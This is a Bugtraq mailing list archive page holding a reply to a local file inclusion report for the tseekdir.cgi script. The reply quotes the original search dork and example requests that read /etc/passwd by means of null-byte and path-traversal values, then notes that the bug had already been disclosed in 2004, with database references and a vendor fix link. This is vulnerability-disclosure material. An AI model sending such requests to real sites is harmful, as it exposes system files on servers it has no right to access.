Bugtraq mailing list archives
Re: tseekdir.cgi<--Local File Include
From: security curmudgeon <jericho () attrition org>
Date: Mon, 22 May 2006 05:27:05 -0400 (EDT)
: ---------------------------------- : foud by: BoNy-m : Site: http://www.alshmokh.com : E-mail: BoNy-m () hotmail com : ---------------------------------- : : Search: : allinurl:tseekdir.cgi : : example: : /tseekdir.cgi?location=/etc/passwd%00 : /tseekdir.cgi?id=1055&location=/etc/passwd%00 : /tseekdir.cgi?location=/../../../../etc/passwd%00 This appears to be FocalMedia.Net Turbo Seek for the vendor, and this was disclosed almost verbatim Sep 12, 2004. http://osvdb.org/9900 * Nessus Script ID: 14719 * Bugtraq ID: 11163 * Vendor Specific Solution URL: http://www.focalmedia.net/tbdownload.html * Secunia Advisory ID: 12500 * Vendor URL: http://www.focalmedia.net/index_tb.html * Other Advisory URL: http://lwb57.webmen.ru/advisories/text/adv17.txt * Security Tracker: 1011221
Current thread:
- tseekdir.cgi<--Local File Include BoNy-m (May 09)
- Re: tseekdir.cgi<--Local File Include security curmudgeon (May 22)
- <Possible follow-ups>
- Re: tseekdir.cgi<--Local File Include Steven M. Christey (May 10)